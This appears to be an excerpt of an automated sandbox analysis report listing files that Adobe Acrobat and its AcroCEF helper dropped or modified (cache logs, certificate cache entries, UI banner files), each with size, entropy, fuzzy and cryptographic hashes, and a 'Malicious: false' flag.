SSDEEP: | 3:HU/lEYe2RuukAt/57Dek3JAOwkY8vollEqW3l/TjzzQ/t:Uyz0uuFR3t6R8Qmd8/ |
MD5: | EDF33A4EF5AA8C8A655C8A362265BBED |
SHA1: | D5B176188F0B352D161F00A495C74D26A76B00E8 |
SHA-256: | A15D6183AAC491EC98490E96D892CBE765D7080929B60C321023EC28B03DF69F |
SHA-512: | 439D79885F4AB17E5111A13FB60CCA653A71DC615EE02AB68C34B794E28880E1C537E74DDEC121FE4BA5B7C731CA920F307CE9707C5CACAFECE8599F1EF1C4F8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.173712355612882 |
Encrypted: | false |
SSDEEP: | 6:iO4qVuFyq2PcNwi2nKuAl9OmbnIFUtSqVuP1ZmwsqVuZRkwOcNwi2nKuAl9Ombjd:7nuFyvLZHAahFUtZuN/LuZR54ZHAaSJ |
MD5: | 9ACEC638413E6D47F0F30433EDB95307 |
SHA1: | 9EF922B90D2E273A1DB9D0BCEB709FD8A93C5F5C |
SHA-256: | 4F9331253513269A34C8FFDA91F8088F350DBDC340D8AB004014D8C14767B7B5 |
SHA-512: | AE8DE720DBB54399C4898236F4476DB7BC1D9AC55F284E75CE3724C9680726D597ABD630D770475C659060C2C6017D465C9E9350AACF1F14285C732D362DDF55 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.173712355612882 |
Encrypted: | false |
SSDEEP: | 6:iO4qVuFyq2PcNwi2nKuAl9OmbnIFUtSqVuP1ZmwsqVuZRkwOcNwi2nKuAl9Ombjd:7nuFyvLZHAahFUtZuN/LuZR54ZHAaSJ |
MD5: | 9ACEC638413E6D47F0F30433EDB95307 |
SHA1: | 9EF922B90D2E273A1DB9D0BCEB709FD8A93C5F5C |
SHA-256: | 4F9331253513269A34C8FFDA91F8088F350DBDC340D8AB004014D8C14767B7B5 |
SHA-512: | AE8DE720DBB54399C4898236F4476DB7BC1D9AC55F284E75CE3724C9680726D597ABD630D770475C659060C2C6017D465C9E9350AACF1F14285C732D362DDF55 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 344 |
Entropy (8bit): | 5.1606316391248965 |
Encrypted: | false |
SSDEEP: | 6:iO4qVud4q2PcNwi2nKuAl9Ombzo2jMGIFUtSqVuVyJZmwsqVuVUFKDkwOcNwi2ng:7nud4vLZHAa8uFUtZuMJ/Lu+FKD54ZHA |
MD5: | 6E539192705E83BAC01F7745C2D15CF1 |
SHA1: | 714B03C82545707CFBEAAED388A0E0AB90AAD3AD |
SHA-256: | 9C4CA092F1583741F34968784524E05BCFD63B07FF4D7840779B87586E6E475B |
SHA-512: | E7C12C1CC50B58838BBED08515E16962C6B416E11F36FFE4E173FD08E32583824D613171D81967ED38EDD831FA295908064F3FC786A5184BE42097C15FF3EBB3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 344 |
Entropy (8bit): | 5.1606316391248965 |
Encrypted: | false |
SSDEEP: | 6:iO4qVud4q2PcNwi2nKuAl9Ombzo2jMGIFUtSqVuVyJZmwsqVuVUFKDkwOcNwi2ng:7nud4vLZHAa8uFUtZuMJ/Lu+FKD54ZHA |
MD5: | 6E539192705E83BAC01F7745C2D15CF1 |
SHA1: | 714B03C82545707CFBEAAED388A0E0AB90AAD3AD |
SHA-256: | 9C4CA092F1583741F34968784524E05BCFD63B07FF4D7840779B87586E6E475B |
SHA-512: | E7C12C1CC50B58838BBED08515E16962C6B416E11F36FFE4E173FD08E32583824D613171D81967ED38EDD831FA295908064F3FC786A5184BE42097C15FF3EBB3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.971316048517525 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqzsBdOg2HBcaq3QYiubSpDyP7E4TX:Y2sRdsldMH43QYhbSpDa7n7 |
MD5: | 80C5742E3C16D947AEC69D972978D2A3 |
SHA1: | 755CF819FB99AF6BAD6F1E2250EBC57E0EB3E0F3 |
SHA-256: | F7AA6FC19270B21A87F6AF42FC752D2717833827EF1BC79AD6B7DABAF5E346F8 |
SHA-512: | D7A861FD3A8C17F276B9DA27C9733A0700B33E78F2912E497AB457324C0D3E2BB02D662092C8DFA001D079BEF9FCE96B7FC7018F0D86C59B76CC5755F26EB070 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\e5803001-5d31-4c76-a855-937ac2d75eb4.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.971316048517525 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqzsBdOg2HBcaq3QYiubSpDyP7E4TX:Y2sRdsldMH43QYhbSpDa7n7 |
MD5: | 80C5742E3C16D947AEC69D972978D2A3 |
SHA1: | 755CF819FB99AF6BAD6F1E2250EBC57E0EB3E0F3 |
SHA-256: | F7AA6FC19270B21A87F6AF42FC752D2717833827EF1BC79AD6B7DABAF5E346F8 |
SHA-512: | D7A861FD3A8C17F276B9DA27C9733A0700B33E78F2912E497AB457324C0D3E2BB02D662092C8DFA001D079BEF9FCE96B7FC7018F0D86C59B76CC5755F26EB070 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4099 |
Entropy (8bit): | 5.232428765427693 |
Encrypted: | false |
SSDEEP: | 96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtP3DrO4K:CwNw1GHqPySfkcigoO3h28ytP3DrO4K |
MD5: | 9E5D0B5E7B6FA7725AF70E8146682DBB |
SHA1: | B0F64382068B0E547CDAF9014D89BC8B8271FECF |
SHA-256: | A34FF48A54011BCA5367E3B0EEE915930DBB533B5B07ECEB97AA3F8B073171D7 |
SHA-512: | 1349FD697BBBFF29FD222EF55D35D29E36014882A511A09829C49385AC18C2E333CB2AE46EC571FF43C9F872305BA01361CBF9FFE6F227F5A25128C47E898070 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 332 |
Entropy (8bit): | 5.195122870716503 |
Encrypted: | false |
SSDEEP: | 6:iO4qVuhP4q2PcNwi2nKuAl9OmbzNMxIFUtSqVuhlkJZmwsqVuhlkDkwOcNwi2nKA:7nuhP4vLZHAa8jFUtZuhiJ/LuhiD54Zv |
MD5: | C4C4DEB728DD7B9E3CF9AE474FF7F9BA |
SHA1: | 376D279DC514E1762487C388C2424994284C83C7 |
SHA-256: | A6ABB6F76BA8BC2F4EB0C2890B262D31901AFF9AADDDA59230EFB4456E783120 |
SHA-512: | 2D89573A9479E556EC5B0FF5EAD935D53D76440002506003E47CA379791B95A0404D722BEB31C1A104475783C68EDD0AE19CE7DF2D3DB1B153BD8EC5683B9A85 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 332 |
Entropy (8bit): | 5.195122870716503 |
Encrypted: | false |
SSDEEP: | 6:iO4qVuhP4q2PcNwi2nKuAl9OmbzNMxIFUtSqVuhlkJZmwsqVuhlkDkwOcNwi2nKA:7nuhP4vLZHAa8jFUtZuhiJ/LuhiD54Zv |
MD5: | C4C4DEB728DD7B9E3CF9AE474FF7F9BA |
SHA1: | 376D279DC514E1762487C388C2424994284C83C7 |
SHA-256: | A6ABB6F76BA8BC2F4EB0C2890B262D31901AFF9AADDDA59230EFB4456E783120 |
SHA-512: | 2D89573A9479E556EC5B0FF5EAD935D53D76440002506003E47CA379791B95A0404D722BEB31C1A104475783C68EDD0AE19CE7DF2D3DB1B153BD8EC5683B9A85 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.438565903496576 |
Encrypted: | false |
SSDEEP: | 384:Setci5GWiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:SeurVgazUpUTTGt |
MD5: | 955BD0E1727F06B8A7D3FE6CFD6DA0C4 |
SHA1: | DCE712BBC351A378C60956306F8101EA16C93586 |
SHA-256: | 0C28B244B1A38BAF2194AA793A71D3D07BC503BA6590F2A2C7B830041281986D |
SHA-512: | BC8B8758A3B9EB3F7CCC73652BB396F07006B0CA732EE4B75C48F6902E0DDF9433AFE76622D25D8E1BC5D934300FE1F4BFB0F0BAEB0EC1DE87BE7935326EB240 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.215379849406636 |
Encrypted: | false |
SSDEEP: | 24:7+t4z6wKjRqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9MG:7MIW1qvmFTIF3XmHjBoGGR+jMz+LhH |
MD5: | 3CEBE9544BA8CFE159DA34B52AD4E200 |
SHA1: | 4A763819B16124BD3C8FAB6BA2B9C26AF8DF3D9A |
SHA-256: | F6D749BCB84E8A82BD8AA37F0D8C133E41E29E1145D392262E466ADFA9F30E1A |
SHA-512: | 3F878B422E20944FCA9C1ECB72E844955CFD65480FDE74C4A1AB7F9F35E0975ADC0BD58DAB837D0C34582C62FC755EC2967F15AD56B6EE1AAFE357B71415941E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7321365340992054 |
Encrypted: | false |
SSDEEP: | 3:kkFkl9zEkPtfllXlE/HT8k76lZNNX8RolJuRdxLlGB9lQRYwpDdt:kKbseT8yO3NMa8RdWBwRd |
MD5: | DD45BCF2FA35E4AD84E60ED079BBD6DB |
SHA1: | 672D269AA3580FAFAB098DF785A20BE7F1BF370F |
SHA-256: | 87FA6EC23B7D2F2445742482D8AE12D5DB47F29BF2B1D93C6FD41CFE1F19DA77 |
SHA-512: | FFCB1D77811EC8299F173A0A493F07174EF739194C048FED19D21A0A1078D6CEAF0762D740908870B0337CDA29BBD8C0569438BD7260A2D677BC774DDCB1C37F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.2368928658074476 |
Encrypted: | false |
SSDEEP: | 6:kKSiyL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:QiDImsLNkPlE99SNxAhUe/3 |
MD5: | 8889EAF7084A453348FA52381F8D703A |
SHA1: | D5EBF367AC55F9B21CC2C6AE9490D9FAF85CFA7D |
SHA-256: | 1E49D308964D57629538F6946F00B1BB892D2EE47117A3646E83CA05DCBDE078 |
SHA-512: | D953B2EA5CC72A8928DAC4EEE6FE74CB4B3EA8546F40DE25C6245EB376BC9A6EBF26F0C3792AB6B4C4E053FFB5612393F2F3359263329AE9B37094ED7DFB129D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.355968911625682 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFWQgsC4EimR4WsGiIPEeOF0YcoAvJM3g98kUwPeUkwRe9:YvXKXFOsCYCbsdTeOPGMbLUkee9 |
MD5: | 5E1AD1EF3560B96AEE3C8DA6F2503AC6 |
SHA1: | 066643FDB274ED9F59A703466FF4F1E3B7E96248 |
SHA-256: | 7FA4018CC03740A9A6F112EB5289D05DBEF73ECBC1D6D74D16B678A93CA96FA3 |
SHA-512: | 59D6CB0B603FDAA9F6644150FEE0B1599D035C3EF92DCB368D4AEE0BEF7E2F660C40873FC2B256D627CE1EACE7C122ED01F107E6F82EB863DD6646207E465EDA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.288541716900822 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFWQgsC4EimR4WsGiIPEeOF0YcoAvJfBoTfXpnrPeUkwRe9:YvXKXFOsCYCbsdTeOPGWTfXcUkee9 |
MD5: | B72BA38F050E58A196AD0DE674021BC2 |
SHA1: | 19919019C5C8C9EBA2FA3805717A8E4AA7956BC8 |
SHA-256: | 76663F7265A9F84AF7422A3BFEF6104EF27130EC0E7596E0CEDBC72873537A8A |
SHA-512: | 7E3E93E207684290D29CE6B7A4580C8A138CC7D91A29F912672F932A074D820F3F5B7003838409B9247772A048A35CDB66029E929FD1090356EFECD5D334DF02 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.267362791946421 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFWQgsC4EimR4WsGiIPEeOF0YcoAvJfBD2G6UpnrPeUkwRe9:YvXKXFOsCYCbsdTeOPGR22cUkee9 |
MD5: | F5B94FBBB035CA23D3DCB63B7DDECD0D |
SHA1: | D5AD3163C94469F2A611FDDC4357110853DB4487 |
SHA-256: | DB64681902D9D7A0C47BC1132604D0145ECD556BC1A874AA5F7FDBFCE7D4E06E |
SHA-512: | 452974BCDC06B4F48524B75D9BB98EF695211F6A518A8B6BE6E907CB2EBA61B0A3F4718AC98525A84357F34FB57D820C342EFD7D229A25A717F14504871EE8C0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.342587759528165 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFWQgsC4EimR4WsGiIPEeOF0YcoAvJfPmwrPeUkwRe9:YvXKXFOsCYCbsdTeOPGH56Ukee9 |
MD5: | 66E2A464607F76CA3E57E039AA1CBB0E |
SHA1: | E3DEA5F92663F20914BF06A7661CC705D613A8BE |
SHA-256: | 954C16E388E22E6A55D8C2C7D7F9332505C85F1FC0AB294ACFF34F9FFB6F5230 |
SHA-512: | 8EFB5E9F88EA4DD11FE77341101EA6BEC429F15BB1B3C2A9E6DAD2EF2EDD8F6CE086CEBCFD06BF6E2055981AEB9B1A71FA52443D8507034BCAAF16B83289E4C5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.685796726630383 |
Encrypted: | false |
SSDEEP: | 24:Yv6XoQCbmeOUpLgE9cQx8LennAvzBvkn0RCmK8czOCCSX:YvhQhevhgy6SAFv5Ah8cv/X |
MD5: | CB51A03644823E6E6109EA304E9D03BA |
SHA1: | 582CA3DE27E76C1E35CC55703D69AAF1199D261E |
SHA-256: | 1266E194D831CFC2102404CAE06595216F783C8A203CF3E5E19C95A4998FAAC9 |
SHA-512: | 8709F55F469931AF47925A72948C5DFC721698ED7BD5B783A716961A95AE4E9A455911579F0C06AAB694BE223067B6814E9903A3E97B27EDC7A20162C63E6388 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.27797654529416 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFWQgsC4EimR4WsGiIPEeOF0YcoAvJf8dPeUkwRe9:YvXKXFOsCYCbsdTeOPGU8Ukee9 |
MD5: | C1233CEE5BAD6C9D6FC5B1191A7D39F3 |
SHA1: | 3A5A2028F041DDC6669AEFA29BAFB60EFCCE4484 |
SHA-256: | 6D48DD2BCBF4C899DABB809B0993C5056880CE467D10759166D97FB45A7BFDF5 |
SHA-512: | C7F46674578075B2980D7F1CD9D2FA3F2530CB0F0F8ECF2D8E6BF036C354145E58A79E02389416B94D8787100EA6F61DD31A26A58F72D29E12FA6E89ED52A1EB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.2821196219555056 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFWQgsC4EimR4WsGiIPEeOF0YcoAvJfQ1rPeUkwRe9:YvXKXFOsCYCbsdTeOPGY16Ukee9 |
MD5: | 16CC766ADFFA37B41F52DAE8F7DB451F |
SHA1: | 118D98B1EB72E1B32D7CD9ADBA74B7B3518418B7 |
SHA-256: | E362BC5B7FD5886EFB8FFC64914B5F21AEDCF0AD7A6CC02FF2B459F1196208AE |
SHA-512: | F5FE1926C7489E49FC99F3113438A62AE72A7F1A24C8CFF2D762326E72F6B0C6ED746CC45D7CABD4473AE5AA8902F6A483F953D558003FF98B8A212CD96D28DD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.2984429200955185 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFWQgsC4EimR4WsGiIPEeOF0YcoAvJfFldPeUkwRe9:YvXKXFOsCYCbsdTeOPGz8Ukee9 |
MD5: | 458D48EE4B08DD837C4C2E8E67061F56 |
SHA1: | 56B0E0C595F803F6A202CCEEBA4139EA7A42DD12 |
SHA-256: | C356122F847C31B6D3D1A8645D243D562DEB3F4C04EAA953653F08ACE2341C39 |
SHA-512: | D61B2CAA604B40791A66E4F644AB38D11B23C533A4B8371AE8C9B517A02C56081BF48E13CC6E162F6A92BC41F32A5057519B0443D312D2E39C6423CA26E038C0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.3040128674045395 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFWQgsC4EimR4WsGiIPEeOF0YcoAvJfzdPeUkwRe9:YvXKXFOsCYCbsdTeOPGb8Ukee9 |
MD5: | 701F2F228C4000EFC44F05148ECD6702 |
SHA1: | EF383651819DA328EDADAF13C00041DD92A5FF40 |
SHA-256: | 2F04222547BAD08B417845C4F8DC0EAD7F32F3F977189169ACF8034D4BA76417 |
SHA-512: | B77A74A07D5C2825BE4F3C5C9CA5EDC47B79E48AB3CF97582172A7963852E883D4E6ADDF419D732DC45807B7D620EE4EF21F0905CC46D379EC474A4743EC9CB9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.284615386938353 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFWQgsC4EimR4WsGiIPEeOF0YcoAvJfYdPeUkwRe9:YvXKXFOsCYCbsdTeOPGg8Ukee9 |
MD5: | 96EC527729DF01935E95DB962CD06B29 |
SHA1: | A35AFBD4FB163A4557BA93E02C61EE46C6153046 |
SHA-256: | E5375132278356CCFE65F7C1F3933DD8AF6817707565705C011EFBCBC2D553A0 |
SHA-512: | 9B8938A6CB1980A84C9DC27A95E80166B37FB9FCFA8D0501BD8A1F5559972A58F13D72E72EEB884E1ED243BE96885E2BAACAAEC5C703F4D2128D9FFD7447B178 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.270976257517925 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFWQgsC4EimR4WsGiIPEeOF0YcoAvJf+dPeUkwRe9:YvXKXFOsCYCbsdTeOPG28Ukee9 |
MD5: | BBDA5B2BC72678B2EBD661E2080BAA47 |
SHA1: | 54D95BA4B390752F42F99DA4E3821A95E2A3BFF3 |
SHA-256: | 457797F97C2D015BE1B4776DBC2A95C5510347814A6E8238229DFF641FF71855 |
